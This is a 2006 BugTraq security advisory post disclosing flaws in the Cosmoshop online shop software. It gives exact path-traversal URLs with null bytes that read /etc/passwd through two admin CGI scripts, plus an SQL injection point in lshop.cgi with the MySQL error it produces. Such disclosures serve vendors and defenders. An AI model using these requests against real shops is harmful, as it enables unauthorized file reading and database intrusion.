BugTraq
[cosmoshop again] sql injection + view all files as admin user May 18 2006 06:32AM
innate gmx de
i am: l0om

page: www.excluded.org

product: cosmoshop

1) show all files as admin-user

2) sql injection

Cosmoshop - Lse (<= )V8.11.106

1) Show all files as an admin-user:

/cgi-bin/admin/bestellvorgang/edit_mailtexte.cgi?file=../../../../../../
../../../etc/passwd%00

/cgi-bin/admin/bestmail.cgi?action=view&file=../../../../../../../etc/pa
sswd%00

2) SQL Injection

cgi-bin/lshop.cgi?action=showdetail&artnum=10[' UNION SELECT OR OTHER SQL]&wkid=2002g&ls=d&nocache=

get_artikel_from_db: Fehler bei SELECT artnum,artpreis,artzub,artbild,artmwst,artlayout,artangebot,

artlieferzeit,artinaktiv,artrabattgruppe,special_price,artneu,artstaffel
,artpreis_ek,artdate,artbestand,

artbestand_min,artbestand_ignore,artgewicht_netto,artgewicht_brutto,artn
um2,artlieferant,artd_abverkauf,

artd_lieferzeit,artlieferdatum,artpreiswunsch,artebay,artnam,artdesc,art
ausf_1,artausf_2 FROM shopartikel

as a LEFT JOIN shopartikelcontent AS ac ON (a.artnum=ac.artnr AND ac.sprache ='d') WHERE 1 AND artnum='10'' <-- you enter here

:You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for

the right syntax to use near ''10''' at line 1

in sub: main::get_artikel_from_db (<FULL PATH HERE>/lib/lshopartikel_sql.pm, line 257)

called by: main::get_artikel_content_by_id

hopefully this time cosmoshop will be fixed

best wishes,

l0om

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus